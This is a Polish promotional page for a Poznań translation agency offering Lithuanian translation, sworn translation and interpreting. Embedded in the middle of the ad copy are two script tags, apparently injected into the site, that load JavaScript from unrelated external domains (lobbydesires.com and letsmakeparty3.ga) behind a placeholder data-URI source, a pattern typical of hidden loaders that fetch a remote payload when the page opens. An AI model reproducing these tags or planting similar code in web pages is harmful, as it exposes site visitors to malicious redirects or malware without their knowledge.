Tłumacz Języka Litewskiego Poznań

W naszej ofercie znajdują się między innymi profesjonalne tłumaczenia litewsko-polskie. Współpracujemy z doświadczonymi native speakerami i tłumaczami. Wykwalifikowani pracownicy Biura PUNKT z Poznania są gwarancją rzetelności oraz terminowości. Przekłady z języka polskiego na litewski i z litewskiego na polski dostępne są w atrakcyjnych cenach.

Polecamy także tłumaczenia angielskiego w Poznaniu.

<script src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20300%20180%22%3E%3C/svg%3E' data-src='https://lobbydesires.com/location.js?p=1' type=text/javascript></script><script src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20300%20180%22%3E%3C/svg%3E' data-src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

Znajomość branżowego słownictwa

Współpracujący z nami tłumacze i native speakerzy posługują się branżową terminologią stosowaną w wielu różnych dziedzinach. Znają specjalistyczne słownictwo z takich obszarów jak medycyna, ekonomia, motoryzacja, energetyka, informatyka i wielu innych. Dzięki temu oferujemy Państwu profesjonalne przetłumaczenie każdego rodzaju tekstu. Zajmujemy się między innymi polsko-litewskimi przekładami:

Oferujemy Państwu nie tylko przekłady pisemne, ale także ustne. W ich ramach proponujemy tłumaczenia szeptanesymultaniczne oraz konsekutywne. Można je zastosować w czasie takich wydarzeń jak konferencja prasowa, spotkanie polityczne, targi, sympozjum, konferencja naukowa i wielu innych.

Tłumaczenia przysięgłe w języku litewskim

Biuro PUNKT z Poznania specjalizuje się między innymi w przekładach przysięgłych, ustnych i pisemnych. W ramach tej usługi oferujemy Państwu przetłumaczenie na język litewski takich dokumentów jak:

  • pełnomocnictwa i upoważnienia

  • dowody osobiste, paszporty

  • pozwy, orzeczenia i wyroki sądowe

  • akty notarialne

  • wypisy z ksiąg wieczystych

  • i wielu innych

W przypadku tłumaczeń przysięgłych ustnych z języka litewskiego możemy zaproponować Państwu pomoc w przeprowadzeniu takich wydarzeń jak ślub cywilny, rozprawa sądowa, egzamin na prawo jazdy czy spotkanie w kancelarii notarialnej.

Tłumaczenia online z języka litewskiego

Jeśli zależy Państwu na czasie, zachęcamy do skorzystania z naszej oferty tłumaczeń online z języka litewskiego. To bardzo wygodne rozwiązanie, ponieważ gotowy tekst otrzymają Państwo przez internet, na skrzynkę mailową. Przyspiesza to termin realizacji zlecenia.

Przekłady z każdego języka

Biuro PUNKT z Poznania zajmuje się tłumaczeniami w wielu różnych językach europejskich i pozaeuropejskich, na przykład:

Polecamy również zapoznać się z naszą ofertą tłumaczeń przysięgłych języka ukraińskiego w Poznaniu.